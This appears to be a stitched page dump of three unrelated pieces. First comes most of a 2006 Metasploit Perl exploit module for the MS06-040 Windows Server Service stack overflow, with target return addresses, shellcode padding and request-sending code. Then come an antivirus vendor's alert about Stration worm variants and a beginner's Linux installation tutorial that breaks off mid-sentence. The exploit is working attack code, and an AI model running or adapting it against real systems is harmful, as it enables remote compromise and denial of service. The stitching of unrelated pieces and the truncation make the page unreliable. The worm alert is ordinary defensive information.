This module exploits a stack overflow in the NetApi32 NetpIsRemote() function
using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that
other RPC calls could be used to exploit this service. This exploit will result in
a denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt
will likely result in a complete reboot on Windows 2000 and the termination of all
SMB-related services on Windows XP. The default target for this exploit should succeed
on Windows NT 4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1.
}
),

'Refs' =>
[
[ 'BID', '19409' ],
[ 'CVE', '2006-3439' ],
[ 'MSB', 'MS06-040' ],
],

'DefaultTarget' => 0,
'Targets' =>
[
[ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)' ],
[ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', 1000, 0x00020804 ],
[ '(wcscpy) Windows XP SP0/SP1', 612, 0x00020804 ],
[ '(stack) Windows XP SP1 English', 656, 680, 0x71ab1d54], # jmp esp @ ws2_32.dll
],

'Keys' => ['srvsvc'],

'DisclosureDate' => 'Aug 08 2006',
};

sub new {
my ($class) = @_;
my $self =
$class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
return ($self);
}

sub Exploit {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target_name = '*SMBSERVER';

my $FragSize = $self->GetVar('FragSize') || 256;
my $target = $self->Targets->[$target_idx];

if (!$self->InitNops(128)) {
$self->PrintLine("Could not initialize the nop module");
return;
}

my ( $res, $rpc );

my $pipe = '\BROWSER';
my $uuid = '4b324fc8-1670-01d3-1278-5a47bf6ee188';
my $version = '3.0';

my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );

my $dce = Pex::DCERPC->new(
'handle' => $handle,
'username' => $self->GetVar('SMBUSER'),
'password' => $self->GetVar('SMBPASS'),
'domain' => $self->GetVar('SMBDOM'),
'fragsize' => $self->GetVar('FragSize'),
'bindevasion' => $self->GetVar('BindEvasion'),
'directsmb' => $self->GetVar('DirectSMB'),
);

if ( !$dce ) {
$self->PrintLine("[*] Could not bind to $handle");
return;
}

my $smb = $dce->{'_handles'}{$handle}{'connection'};

if (! $smb) {
$self->PrintLine("[*] Could not establish SMB session");
return;
}

if ( $target->[0] =~ /Automatic/ ) {
if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
$target = $self->Targets->[1];
$self->PrintLine('[*] Detected a Windows 2000 target');
}
elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
$target = $self->Targets->[2];
$self->PrintLine('[*] Detected a Windows XP target');
$self->PrintLine('[*] This will not work on SP2!');
}
elsif ( $smb->PeerNativeOS eq 'Windows 4.0' ) {
$target = $self->Targets->[1];
$self->PrintLine('[*] Detected a Windows NT 4.0 target');
$self->PrintLine('[*] Please email us with the results!');
}
else {
$self->PrintLine('[*] No target available for ' . $smb->PeerNativeOS() );
return;
}
}

#
# /* Function 0x1f at 0x767e912c */
# long function_1f (
# [in] [unique] [string] wchar_t * arg_00,
# [in] [string] wchar_t * arg_01,
# [out] [size_is(arg_03)] char * arg_02,
# [in] [range(0, 64000)] long arg_03,
# [in] [string] wchar_t * arg_04,
# [in,out] long * arg_05,
# [in] long arg_06
# );
#

my $stub;

#
# Use the wcscpy() method on NT 4.0 / 2000
#
if ($target->[0] =~ /2000/ && ! $target->[3]) {

# Pad our shellcode out with nops
$shellcode = $self->MakeNops($target->[1] - length($shellcode)) . $shellcode;

# Stick it into a path
my $path = $shellcode . (pack('V', $target->[2]) x 16) . "\x00\x00";

# Package that into a stub
$stub =
Pex::NDR::Long(int(rand(0xffffffff))).
Pex::NDR::UnicodeConformantVaryingString('').
Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
Pex::NDR::Long(int(rand(250)+1)).
Pex::NDR::UnicodeConformantVaryingStringPreBuilt( "\xeb\x02" . "\x00\x00").
Pex::NDR::Long(int(rand(250)+1)).
Pex::NDR::Long(0);
#
# Use the wcscpy() method on XP SP0/SP1
#
} elsif ($target->[0] =~ /XP/ && ! $target->[3]) {

# XP SP0/SP1
my $path =
# Shellcode (corrupted ~420 bytes in)
$shellcode.
# Padding
Pex::Text::AlphaNumText($target->[1] - length($shellcode)).
# Land 6 bytes in to bypass garbage (XP SP0)
pack('V', $target->[2] + 6).
# Padding
Pex::Text::AlphaNumText(8).
# Address to write our shellcode (XP SP0)
pack('V', $target->[2]).
# Padding (required)
Pex::Text::AlphaNumText(32).
# Jump straight to shellcode (XP SP1)
pack('V', $target->[2]).
# Padding
Pex::Text::AlphaNumText(8).
# Address to write our shellcode (XP SP1)
pack('V', $target->[2]).
# Padding (required)
Pex::Text::AlphaNumText(32).
# Terminate
"\x00\x00";

# Package that into a stub
$stub =
Pex::NDR::Long(int(rand(0xffffffff))).
Pex::NDR::UnicodeConformantVaryingString('').
Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
Pex::NDR::Long(int(rand(250)+1)).
Pex::NDR::UnicodeConformantVaryingString('').
Pex::NDR::Long(int(rand(250)+1)).
Pex::NDR::Long(0);

#
# Use the stack overflow method if a return address is set
#
} elsif( $target->[3]) {

my $buff = Pex::Text::AlphaNumText(800);
substr($buff, 0, length($shellcode), $shellcode);
substr($buff, $target->[1], 4, pack('V', $target->[3]));
substr($buff, $target->[2], 5, "\xe9" . pack('V', ($target->[1] + 5) * -1 ));

my $path = "\\\x00\\\x00". $buff. "\x00\x00";

# Package that into a stub
$stub =
Pex::NDR::Long(int(rand(0xffffffff))).
Pex::NDR::UnicodeConformantVaryingString('').
Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
Pex::NDR::Long(int(rand(250)+1)).
Pex::NDR::UnicodeConformantVaryingString('').
Pex::NDR::Long(int(rand(250)+1)).
Pex::NDR::Long(0);
} else {
$self->PrintLine("This target is not currently supported");
return;
}

$self->PrintLine("[*] Sending request...");

# Function 0x1f is not the only way to exploit this :-)
my @response = $dce->request( $handle, 0x1f, $stub );

if ( length($dce->{'response'}->{'StubData'}) > 0) {
$self->PrintLine("[*] The server rejected it, trying again...");
@response = $dce->request( $handle, 0x1f, $stub );
}

if ( length($dce->{'response'}->{'StubData'}) > 0) {
$self->PrintLine("[*] This system may be patched or running Windows XP SP1 or SP2");
}

if (@response) {
$self->PrintLine('[*] RPC server responded with:');
foreach my $line (@response) {
$self->PrintLine( '[*] ' . $line );
}
}

return;
}

1;

# milw0rm.com [2006-08-10]

Virus Emergency Response

2006-09-11T13:59:00.000+07:00

A new variant of W32/Stration worm is heavily spreading in the Internet. We have received a lot of reports of infection of W32/Stration.G worm.

The infected email contains a message similar to the other variants of W32/Stration worm. The 'From' email address in this variant will be one of the following:

Greenpxjzx@fastmail.fm
Moore2005@mail.com
Susan1952@yahoo.com
Jennifer_ukawo@mail.com

The worm carries a double extension attachment. The first extension will be MSG, DAT, ELM, LOG or TXT and the second extension BAT, CMD, EXE, PIF or SCR. In some cases there may be a lot of blank spaces in between the first and the second extension.

Upon execution the worm tries to mail itself to all the available email addresses in the infected system. The worm also alters the hosts file of the infected system to deny virus signature updates of some antivirus software.

You can learn more about this worm at:

http://www.protectorplus.com/virusinfo/worms/strationg.htm

We have also received many infection reports of another variant, W32/Stration.H worm.

You can learn more about W32/Stration.H worm at:

http://www.protectorplus.com/virusinfo/worms/strationh.htm

Instructions to remove the W32/Stration.G and W32/Stration.H worms from your computer:

Protector Plus is updated to detect and remove the W32/Stration.G and W32/Stration.H worms. An emergency virus database update to detect and remove these worms is available to the users of Protector Plus. To download this update from our web site, right click on Protector Plus icon from the system tray then select 'Update Virus Database now!' from the menu. Others can download a 30 day, fully functional evaluation copy of Protector Plus from:

http://www.protectorplus.com/download/downloadnow.htm

The evaluation copy will detect and remove these worms and also protects against all other known viruses, worms, spyware, trojan attacks, adware, backdoors, exploits, password stealers, dialers, keyloggers, hacktools, rootkits, constructors, binders and other potential security threats.

Order Protector Plus and save 100% on SpamChoke:

Order Protector Plus antivirus software for $29.95 and save 100% on SpamChoke antispam software. SpamChoke keeps your Inbox free of spam emails.

You can order Protector Plus at:

http://www.protectorplus.com/order/order.htm

Best Buy:

Protector Plus Antivirus for Windows - Enterprise Edition Get Virus and Spam protection for 1 Server and 5 Desktops for US$ 294.95. This is an ideal package for small and medium businesses.

Follow the link to know more about it:

http://www.protectorplus.com/order/eedition.htm

You are welcome to use this information to help any one who might need or benefit from it. If you have questions or issues in the usage of Protector Plus, please write to support@protectorplus.com .

The reason this alert is being sent to you is because either you or someone acting on your behalf, subscribed to the Virus Alert Mailing List maintained by us.

If you do not wish to receive further alerts, please send a return mail to unsub@pspl.com

Installing and Using Linux

2006-09-08T18:21:00.000+07:00

Overview

Background Needed

I have tailored the material here to beginners. No special sophistication in computers is needed. Any Microsoft Windows user who, say, understands the difference between the C: and A: drives should be able to understand the instructions here and install Linux in an hour’s time. (Do not be intimidated by the length of this document; you probably will not have to use most of it.)

What Is Linux?
Linux is a form of the Unix operating system. Though originally Unix was used mainly by engineers and scientists and thus was not very familiar to the general public, a lot of what you take for granted on computer systems today began in Unix. A notable example is the Internet—the first major operating system to implement the TCP/IP protocol at the heart of the Internet was Unix, and that led to the general acceptance of the protocol.

In the early 1990s, computer science student Linus Torvalds decided to write his own version of Unix, which he called Linux. Other "homegrown" versions of Unix had been written, such as MINIX, but what distinguished Linux was the scale of worldwide participation involved. Torvalds innocently put a message on the Internet asking if anyone wanted to help, and he got a torrent of responses.

There are a several reasons why Linux is mainstream today. First, it became known as a very reliable, stable operating system, with one result being that Linux has become a major platform for large corporate Web servers. Another reason is that it, and the software associated with it developed elsewhere, is free. Many companies have found that it is cheaper to run Linux on their PCs, both for this reason and because of reduced maintenance costs.

There are several good reasons for you to use Linux:

• As mentioned, Linux is becoming one of the "hottest" software systems. Virtually all of the major companies—IBM, HP, Sun Microsystems, etc.—are promoting it, and Linux is a leading corporate choice for Web servers. Linux is the main operating system used at .

• Linux is also starting to make inroads in large desktop markets, such as businesses, schools and so on, due to its high reliability, lower rate of infection by viruses and the like, and its low cost.

• The Linux community shares. That means that people online are much more willing to help you (see Section 7.2), and more open source software is available. if you are a university computer science student, there are some very important additional advantages:

• Many CS courses make specific use of Unix, and thus their work cannot be done on Windows platforms. Since it is a full Unix system, Linux allows students to do their homework in the comfort of their own homes. If you are new to Unix, click here for my Unix tutorial Web page at

Unix file and directory commands, and so on.
• In installing and using Linux, students learn many practical things about computers which they do not learn in coursework. This practical experience can also help you in job interviews, both for permanent jobs after graduation and for summer jobs and co-ops during your college years. Even if the job you interview for does not involve Unix, you will definitely impress the interviewer if, for example, you discuss various things you have done to use and customize your Linux system.

Obtaining Linux

The Concept of Linux Distributions
There are many different Linux distributions, meaning packagings, "distros" in Linux geek language. The distribution consists of the operating system kernel itself, an installation program, and various applications. Though Linux itself is free, some distributions are commercial products, such as Red Hat, Mandriva and SUSE.1 However, some of these companies, such as SUSE, make available full or partial versions for free on the Web. Others are completely free, such as Fedora Core (a project of Red Hat), Ubuntu, Debian and Slackware.
A major advantage of Mandrake, SUSE and Ubuntu, among others, is that they automatically do the disk partitioning2 for you.
Free Linux distributions may be downloaded from the Web (see Section 2.3), or may be obtained as DVDs in Linux books which you can purchase at your local bookstore. The latter is a very common method. For example, a number of books can be found in almost any bookstore on Fedora Linux.3 By purchasing such a book, one obtains both the software and a large reference book. By the way, if you want the disk partitioning to be done automatically, there are books available for Mandrake, SUSE and Ubuntu.
I tend to use Fedora, but I have also used Red Hat, Mandrake and (long ago) Slackware and was pleased with them. SUSE, Debian and increasingly Ubuntu have some very enthusiastic followers too.4 All the major ones are good.

Live-CD Linux Distributions
A more recent concept in Linux distributions is that of live CD distribution. Here the entire Linux package is on a bootable CD-ROM. The user boots the computer with the CD in the drive, and then Linux boots up.
The advantage of this approach is that one does not involve the disk partitioning, a sometimes difficult process. One is using Linux without actually installing it, and in particular without changing the disk partitioning.
A disadvantage is that it does not allow one’s application programs to save files to the hard drive, unless one has already split the Windows partition, defeating much of the purpose. One can save files to a USB key (in the directory /mnt/usbstorage or something like that; look in /mnt, /media etc.).
That makes the approach ideal for those who wish to just try Linux for a short period of time, but not so 1SUSE, pronounced "Soos-ee" by Linux geeks, formerly was written as SuSE.

Discussed in Section
As of this writing in July 2006, the newest is Fedora Core 5.
I am tempted to use the word "cult-like" in describing Debian’s adherents. :-)
useful for long-term use, The first well-known live-CD distribution was Knoppix, but there are many others today, such as the Slax variant of Slackware. Again, these are downloadable from the Web.
If you use the live-CD approach, you may of course skip Section 3 of this tutorial.

Downloading from the Web
The free distributions, and even some of the commercial ones, are freely downloadable from the Web.
Since URLs change frequently, I’ve chosen not to put many hard links here. One I will give is http://www.linuxiso.org/, a central repository of most standard distributions. Or simply use Google, e.g. plugging in search terms such as "Fedora Linux download," "Mandrake Linux download," "Slackware Live CD" and so on.
Note that this is a lengthy process. I strongly recommend obtaining a DVD from some other source.
Important notes: If you download Linux from theWeb and burn it to CDs or DVDs, make sure that you burn the ISO images, as opposed to copying the ISO file as you would in, say, a backup operation. Your burner software should have a choice in its menu for this. Also, later when you install, if your Linux distribution asks you if you want to do a validity check of your CDs or DVDs before installing, say yes!

Installing Linux
Assumptions
Generality/Specificity of Coverage
This part of the tutorial will not go into the details for installing one particular distribution. That would be impractical, since the details for any one distribution often change substantially from one release to the next. So instead, this section on installation will discuss the major points you should watch for during the procedure. It will sometimes use Fedora/Red Hat and Mandrake as examples for concreteness, but the principles should be similar for most other distributions.

Your Machine
It is assumed that you have an Intel-compatible desktop or notebook, with a bootable CD-ROM or DVD drive. You should have at least 128M of RAM. I recommend that you have at least 10G of disk space available for Linux, though 5G would probably be enough.
The latter condition should hold for almost any machine bought in the last five or six years. One other point, though, is that the boot priority should be set so that the machine tries to boot from CD-ROM or DVD before trying to boot from the hard drive.
Your machine probably already does this, but if not, you can reset the BIOS to do so. Consult your manual on this, or ask at any computer store.

Determine Your Hardware Details
The Linux installation program will be able to sense most of your hardware information. So, you can probably skip this section. But if you want to take about five minutes extra time here, it could be helpful later if you write down some of your hardware types before beginning installation. To check your hardware from Windows, go to My Computer, then System. Click General to get the amount of RAM and CPU type. Then go to Device Manager, and click on the ‘+’ next to each component, e.g. "Disk drives," "Display adapters" and so on. Write down the information, including your hard drive type, such as IDE; your video card make and model; your monitor make and model; the type of connection used for your mouse, such as PS/2; the make and model of your printer; etc.
Do you still have the manual which came with your monitor? If so, check the specs in the back, and write down the horizontal sync and vertical refresh rate, and the make and model.

Partioning Your Hard Drive
As mentioned earlier, some Linux distros, such as Mandrake, SUSE and Ubuntu, automatically do the disk partitioning for you. This is a major advantage, as partitioning is a vital but delicate operation. Later in this section, I’ll give you some options to use if you have a distro that does not do automatic partitioning. But I do suggest that even if you will have automatic partitioning done, it would still be worthwhile for you to read Section.

What Is Partitioning?
Any hard drive will consist of one or more partitions. Each operating system you run on your computer occupies one or more partitions on that hard drive. So, you will need at least one partition for Windows and one (actually two) for Linux.

In Linux terminology, your entire first hard drive is called /dev/hda,6 and partitions within it are called /dev/hda1, /dev/hda2 and so on. Your original Windows single partition was /dev/hda. The notation for your second hard drive, if you have one, will be /dev/hdb, with partitions within it named /dev/hdb1, /dev/hdb2 etc. Your first SCSI disk, if any, is /dev/sda, etc.

Before You Do the Partitioning
You really ought to run Windows’ chkdsk command first, in case you have any bad sectors on your hard drive.

Options for Partitioning
The problem is that almost all PCs sold today have been set up with only one partition, so that Windows occupies the entire hard drive. Of course, the vast majority of that space is initially empty, so there is plenty Actually, /dev is the name of a directory, and hda etc. are considered "files" in that directory. In Unix systems, all I/O devices are treated as files.
This is typical, but not universal. of room for Linux, as long as you shrink the original single partition, which is what you will have to do.
This is one of the two big issues with Linux installation. What options do you have?
• As mentioned earlier, one option would be to choose a distribution which does the shrinking for you automatically, such as Mandrake, SUSE or Ubuntu. Note that that does not force you to actually use that distribution; you can install it just to get the partitioning, and then replace it with, say, Fedora, if you wish, now that the shrinking is done.
• Another option would be to use the free ntfsresize program, getting access to it by temporarily running some live CD. For example, you can do this with Knoppix.
This is a fairly simple process, taking only two or three steps, but be absolutely sure to follow the instructions to the letter, to avoid causing data loss problems in your Windows partition.8 A summary of the steps is as follows
After booting the live CD, open a terminal shell window in which you are logged in as root and type something like ntfsresize -s 16G /dev/hda1 which says to shrink your Windows partition10 to 16 gigabytes in size.11 Make sure you write down the new size.
Then you must run Linux’s fdisk (or cfdisk) to complete the actual partition change. Type
fdisk /dev/hda
Then delete theWindows partition /dev/hda1 using the d command, and use the n command to create a new partition (i) of the same size or greater, (ii) of type NTFS and (iii) bootable. (Make SURE you address all three of these aspects carefully.) Since you deleted /dev/hda1, thus leaving you with no partitions at all, the new one will again be /dev/hda1, thus leaving Windows undisturbed. Use the w command to save the new partition structure and exit.
Then reboot into Windows, to make sure everything is OK. A disk check will be done automatically.
• A better alternative than direct use of ntfsresize as described above is to run QtParted, available with Knoppix and some other live CDs. It will run ntfsresize and fdisk (or a substitute) by itself, alleviating you of the need to get into the details.
• Get a commercial program to do the splitting, such as PartitionMagic, PartitionIt or BootIt. The latter offers a free trial period, which may be all you need.
Before you start, give some thought as to how much of the original partition you want to keep for Windows and how much you want to leave for Linux. If you plan to become a serious Linux user, you’ll want to allocate at least half of the space for Linux.
Note that the next option below, using QtParted, automates the process for you. You may prefer it over direct use of ntfsresize This is adapted from http://www.copyleft.co.nz/install-prnt.html, though I have not included creation of an extra Windows FAT32 partition, which is not related to the issue of shrinking.
More accurately, shrink the file system.
If ntfsresize says it can’t shrink your Windows partition, you may need to go back to Windows and run its defragment facility. And as mentioned in Section 7.1, if you want to learn Linux, the only way to do it is to become a serious user.

The Installation Process
By the way, if you are upgrading or replacing another version or distribution of Linux, before beginning. Put your Linux CD-ROM or DVD in the drive, and reboot. The installation program should begin.
During the installation process, you will at various points be asked to make choices. Often you will probably take the default, but here are some things you might consider:
• Some distributions will give you a choice of several installation types, which vary in terms of what kinds of application software will be installed. For instance, Fedora/Red Hat offers you a choice of Personal Desktop, Workstation, Server and Custom installations. If you are a CS student, you need at least Workstation.
But since most people now have plenty of disk space, it is easier to simply ask for everything. In Fedora/Red Hat, for instance, ask for Custom and then check everything there. Again, if you are a CS student, at least make sure you are enabling software development (compilers, editors, etc.).
Note that you can always add more applications later on, though the process might not be so easy. Also, if you are asked what additional language support you want besides English, and you do want some other languages, NOWis the time to say so. You need this support for special fonts (e.g. Chinese characters), so get it now. Again, it may not be so easy to do later.
• Using the space liberated by shrinking your original Windows partition, the installation process will create two new partitions, one root and one swap, for your system files and virtual memory disk space, respectively. Again, if you are given the choice of having this done for you automatically, I suggest taking this option, unless you are familiar with the concepts.
• Assuming you’ll want a dual-boot system, i.e. you’ll be having bothWindows and Linux available for booting, you need some sort of boot loader. This is a program which upon powerup of your computer will ask you which OS you wish to boot at that time. Your distribution may use the GRUB boot loader, or maybe LILO or others. It doesn’t matter that much for a beginner, but definitely indicate that you want to be able to boot both OSs. Take the defaults for everything else, e.g. the choice of bootloader program (LILO, GRUB, etc.).
• If you’re asked whether you want 3-button mouse emulation, say yes. It helps in cut-and-paste operations.
• GUI ("graphical user intrface") desktop manager: The two most widely-used GUI desktop managers for Linux are KDE and Gnome. Each has its band of devoted followers. It really doesn’t matter which one you choose for new users, and you can always switch later if desired. Choose one (or both).
• You may be asked whether you wish to X11 windows GUI to come up automatically at bootup. You’ll probably want to answer yes. If not, you must change the BIOS settings to make the CD-ROMbootable (and the first device checked during the boot process); see your computer’s manual on how to do this. By the way, don’t be worried if the installation assigns noncontiguous names for the partitions. If your Windows partition is /dev/hda1, your Linux partitions could be, say, /dev/hda5 and /dev/hda7 If you do not choose this, most distributions set things up so that you can start the GUI from the text command line via the startx command.
• I mentioned earlier that disk partitioning has over the years been one of the two major issues in Linux installation. The other has been configuring for the video card and monitor.
With today’s modern Linux installation programs, this is typically not a problem. They are pretty good at identifying your video card, and guessing good settings to use. Typically they will give you a chance to test those settings out before continuing with the installation process, with a test image. My experience has generally been that that is sufficient.
If that image does not turn out well, the installation program will typically give you a chance to state the make and model of your video card, and horizontal sync, vertical refresh rate, and make and model of your monitor. That is why I asked earlier if you still have the manual for your monitor. (On a laptop, though, you often don’t have this information, since its monitor is built in.)
By the way, once a configuration has been decided on, it will be saved to a file. This is typically /etc/X11/XF86Config You can look at this if you are curious as to what configuration the installer has chosen for you.
• If you have an Ethernet card, configuration will probably be automatic. You may be asked if your machine has a static Internet address. In most cases, the answer will be no; you probably get a dynamic Internet addres, using a protocol named DHCP. You may asked what your domain name is; if you don’t know, then you probably don’t have one, and in your setting you can just make one up.

Post-Installation Configuration
This section describes some further steps I recommend taking after your installation is finished, of two kinds:
• There are some "extras" which would be nice to configure into your system after installing it.
• Your installation program may run into some problems and decide to skip part of the installation. An example of the latter situation might be that your installation program finds that it does not have a driver for your wireless card, and thus does not enable wireless. Without wireless, you could still work but not as well, and for those of you whose goal is to become adept at Linux, having a "full" Linux machine is a must. Indeed, going through the process of filling in the gaps will be your best Linux learning experiences of all.

Help in Hardware Configuration
Having trouble getting some hardware component to work under Linux? I’ll have some tips on that below, but keep in mind that a great source is the Web. Plug something like "Linux install HP ZE4901" (if that’s the machine you own) into Google, and you’ll find a number of reports of experiences by other people with

your machine.

Configuring Your Search Path ("Why can’t I run my a.out?")

Most Linux distributions do not include your current directory, ‘.’, in the PATH variable. Thus if for example

you compile a program and then type

a.out

the shell may tell you that a.out is not found. You can get around this by explicitly specifying the current

directory,

./a.out

but this is inconvenient.

To remedy this problem more directly in the case of the BASH shell (the default shell for most distributions),

edit the file /.bash profile In the line which sets PATH, append ":." (a colon and a dot) at the end of the

line, with no intervening spaces. Then log out and log in again, or do

source ˜/.bash_profile

Configuring a Printer

Your Linux distribution should have some program to help you configure your printer if something went

wrong during installation. For example, Fedora/Red Hat has the printtool program.

In an "emergency," you can print Postscript files without the usual process machinery (e.g. lpd print daemon).

Say the file name is x.ps and you have an HP Laserjet 4 printer. Then type

gs -dNOPAUSE -sDEVICE=ljet4 -sOutputFile = - x.ps > /dev/lp0

Specifying ‘-’ as the output file means stdout.

Wireless Networking

Device Compatibility

Some wireless network cards commonly sold with PCs today do not have direct Linux drivers available.

However, there is a very clever workaround, ndiswrapper. It takes the Windows driver for the card, and

converts the Windows-dependent aspects16

Here is how I got my wireless card working under Fedora 3 and 4:

• You’ll need to have the kernel sources installed. The ndiswrapper file INSTALL suggests running

ls /lib/modules/‘uname -r‘/build

to check whether the proper files are there.17

If you don’t have the files, you’ll need to either get them from the CDs or DVD that you installed

Linux from, or download them. Either way, put them in the proper subdirectory of /usr/src and then

make a link, as described in the Wiki cited below.

16Note that Intel machine language is Intel machine language, whether underWindows or Linux. So, most of theWindows driver

applies directly to Linux.

17Note the reverse apostrophes, which run the command uname -r, which returns the version of the kernel.

• I downloaded the source of ndiswrapper from the home page, http://ndiswrapper.sourceforge.

net/. I then followed the instructions on installation at that page (click on Wiki | Installation).

• I installed it, following the simple instructions.

• I determined which wireless card I had (Broadcom), both by running dmesg and lspci under Linux, and by exploring under Windows.
• I obtained the driver files for my Broadcom wireless card. Windows said that it was using bcmwl5.sys for this card. I downloaded bcmwl5.sys and bcmwl5.inf from the ndiswrapper home page. I also
got bcmwl5.sys from my Windows partition, in my case at
c:\windows\system32\drivers\bcmwl5.sys
(that’s an "ell," not a "one," before the 5) and found that it was different from the one I had downloaded.
It later turned out that the downloaded one was wrong, though bcmwl5.inf was all right.
• I put the various .sys and .inf files into the same directory, as requested.
• I installed the driver, by typing
ndiswrapper -i bcmwl5.inf in that directory.
This created the directory /etc/ndiswrapper/bcmwl5, with the .inf, .sys and other files there.18
• As a check that the driver was installed, I typed

ndiswrapper -l That got everything installed. Now, each time I boot up,19, I will type modprobe ndiswrapper dhpclient The first command automatically sets up a wlan0, and the wireless card starts working, e.g. scanning for wireless access points. The second command starts up the DHCP client, so that my machine will accept an IP address assigned by a wireless access point.
Useful commands are iwconfig, ifconfig, iwlist (with the scanning option) and dmesg. For example, to select a particular wireless access point named X, type
iwconfig wlan0 "X"
(Do this BEFORE running dhclient.)
If I ever want to delete it, I will type
ndiswrapper -e bcmwl5
I can automate this if I wish.
Other Considerations
I found in one wireless site that there seemed to be a problem with DNS, the system that translates "English" addresses like wwww.google.com to their numerical counterparts, e.g. 66.102.7.104. If you find that the former fails but the latter works, you probably have a DNS problem.
One way to handle this would be to configure your machine to have a secondary DNS site. You can use one given to you by your ISP, for instance. To add it, use the network configuration tool in your Linux distro.
For example, under Fedora and GNOME, select Applications | System Tools | Redhat Network.
Configuring KDE/GNOME for Convenient Window Operations
You should find that windowing operations are generally easier in Unix systems than in Windows, in the sense of requiring fewer mouse clicks, if you set things up that way. Personally, I find it annoying in Windows that, when I switch from one window to another, I need to click on that second window. In most Unix windowing systems, all I have to do is simply move the mouse to the second window, without clicking on it. The term for this is focus follows mouse, and we can configure most Unix windowing systems to do this.
Also when I move from one window to another, I want the second one to "come out of hiding" and be fully exposed on the screen. This is called autoraise, and can be configured too.
You can arrange this configuration in less than one minute’s time. Again, the exact configuration steps will vary from GNOME to KDE, and from one version to another within those systems, so I can’t give you the general steps here but here is how it works on a Fedora 3/GNOME system: click Applications | Preferences
|Windows, and check SelectWindows When the Mouse Moves Over Them (this may be referred to as focus on your system) and Raise Selected Windows After an Interval (this may be referred as autoraise). I move the slider for the latter all the way to the left, for 0.0 seconds.
Some Points on Linux Usage
Linux Start Icon
Since there are various Linux distros and GUIs, there is no single Linux analog of Windows’ Start icon. It can be the red hat under Red Hat or Fedora, the "K wheel" icon in KDE, etc. It doesn’t matter, though. Just become familiar with the one on your system.
Logging Out and Shutting Down
To log out, go to your Linux start icon (see Section 5.1), and choose Log Out from the menu. (Or, in Fedora/Red Hat, click on Desktop.)
You should then be presented with various choices, including Shutdown. If you choose the latter, note that with some Linux distros, at the end of the shutdown sequence you have to manually take action when it says Power Down. To do this, hold the On key on your machine down for four seconds.
More on Shells/Terminal Windows
In Microsoft Windows, most work done by most users is through a Graphical User Interface (GUI), rather than in a command window (Start | Run | cmd). In Linux, a lot of work is done via GUIs but also it is frequently handier to use a command window, called a terminal window. You should always keep two or three terminal windows on your screen for various tasks that might arise.
You can start a terminal window by going to your Linux start icon (see Section 5.1). The menu may have a Terminal entry, or you may have to go to something like System Tools. Another alternative you may have is to right-click in the background of your screen, and choose Terminal or something like that from the resulting menu. By the way, you may be given a choice of several terminal types, say gnome-term, xterm etc., but it doesn’t much matter which one you choose.
When you type commands in a terminal window, the program which reads and acts. The default shell in Linux is bash. It is very good, but if you are used to using, say, tcsh,21 you can use the chsh command in any terminal window to change your login shell.
Cut-and-Paste Window Operations The X11 windowing system used in Unix has its roots in 3-button mice, but you probably have only a button mouse. That’s no problem, because Linux does 3-button emulation for you. The middle button is emulated by simultaneously clicking both left and right buttons.
To do a cut-and-paste operations, hold down the left mouse button and drag it to highlight the text you wish to copy. Then go to the place you wish to copy that text, and simultaneously push both the left and right buttons.
Using Your DVD/CD-ROM and Floppy Drive from Linux
Mount Points
These days most Linux distributions have a designated directory at which file systems form DVD/CDROMs, floppy disks, etc. can be accessed. This will vary from one distribution to another, but typical directory names are /mnt, /media etc., with subdirectory names like /mnt/cdrom, /mnt/cdrom1, /mnt/floppy, /media/cdrecorder.
Check /etc/fstab if you can’t find the mount point. This file controls which file systems are mounted at boot time. Even if you are not familiar with this file, it should give you an idea as to where devices like CD-ROMs are automatically mounted at boot time, by looking for an entry marked auto in the file.
If the device is not automatically mounted, you have to use the Unix mount command to access it. For You may like gnome-term because it is more easily configurable, as to colors, size, etc.
Or if you want to use my shell tutorials, mentioned above.
example, say your CD-ROM drive subdirectory is /mnt/cdrom. Put the CD-ROM in the tray, and then type in a terminal window mount /mnt/cdrom
A file system will then be created with root /mnt/cdrom, containing the CD-ROM’s files.22
When you are done using the DVD/CD-ROM, you need to unmount it. Leave the /mnt/cdrom subdirectory and type either eject (which will also open the tray) or umount /cdrom before attempting to remove the CD-ROM. If you have any trouble (you shouldn’t, but just "if"), then reboot the machine.
You can check what is currently mounted by running the df command from a shell window (another good Linux learning experience).

CD Burning
There are various free fancy Linux programs for this, but I prefer to use the plain cdrecord command, included with most Linux distributions.
To burn a data CD, you’ll need it to be in ISO form. In some cases, e.g. where you download material from the Web which you want to burn into a CD, you may already have an ISO file, i.e. with .iso suffix in its name.
If not, then first put all your data in some directory, say x. Then make an ISO file from it, say named y.iso:
mkisofs -r -o y.iso x
Put a blank CD in the tray. (Do NOT mount it, as it has no file system to mount.) Then log in as root. Your CD device number might not be 0,0 (or 0,0,0; the first 0 may be omitted in certain cases). Type cdrecord -scanbus to find out.
Now burn the file:
Basically, you have added a new file system to whatever you have on disk, except that these files are on the CD, not on disk.
As a learning experiment, try running the df command before and after the mount, and compare.
By the way I’m assuming here that it is a data CD, not audio. For audio CDs, you don’t mount, since there are no files, thus no file system to set up. Instead, use other programs, e.g. gnome-cd. You can then access the files in the same way you do disk files.
DVDs, though, do have files, and thus must be mounted.
cdrecord -eject -v -isosize speed=2 dev=0,0 y.iso
A speed of 2 is very conservative, maximizing the chance that the burn has no errors. If you wish, try omitting the speed field in your command, and cdrecord may choose a higher speed.
A similar dvdrecord command exists for burning DVDs.
If an Emergency Arises
The Linux OS itself is highly stable, but an application program might contain a bug that makes the program freeze up. What can you do?
First of course there is Ctrl-C, typed into the window from which you invoked the program. Assuming you didn’t run the program as a background job (i.e. used an ampersand at the end of the line in which you invokved it), this is likely to work. The authors of some programs, though, have this feature assigned to some other functionality than program termination.
Next, you can try killing the process via the kill command. First look up the process number, by typing ps ax
Say for instance it is 2288. Then type
